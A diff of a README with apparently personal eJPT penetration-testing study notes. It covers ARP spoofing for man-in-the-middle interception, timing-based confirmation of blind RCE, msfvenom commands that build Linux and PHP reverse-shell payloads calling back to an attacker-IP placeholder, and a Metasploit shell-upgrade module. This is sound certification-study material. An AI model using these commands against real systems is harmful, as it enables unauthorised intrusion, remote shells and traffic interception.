osV22/ejpt_notes/README.md

 - Port forward: `echo 1 > /proc/sys/net/ipv4/ip_forward`
 - Arpspoof: `arpspoof -i <interface> -t <target ip> -r <host ip>`, NOTE: `-t` address is the source ip (often the victim) and the `-r` is the destination ip.
 In a MiTM, we are between them.
   - `arpspoof -i eth0 -t 10.10.10.222 -r 10.10.10.240` - Will intercept traffic in that .222-240 range, this is where Wireshark would be of great help.
+- To confirm a blind RCE, you can use time test out if you really have RCE.
+Ex: send `sleep+5` and see if the request takes 5 seconds to comeback in burp.
+- `msfvenom -p linux/x64/shell/reverse_tcp lhost=<Attacker IP> lport=443 -f elf -o 443` - Simple msfvenom reverse shell
+- `msfvenom -p php/reverse_php lhost=<Attacker IP> lport=443 -o revShell.php` - Simple php reverse shell, use with metasploit to get meterpreter later on if possible.
+  - `use post/multi/manager/shell_to_meterpreter` - To upgrade from a simple shell

 ### Good to Know
 - When testing for SQLi, don't just stop at the web UI once you find an injection, use burp to inject into: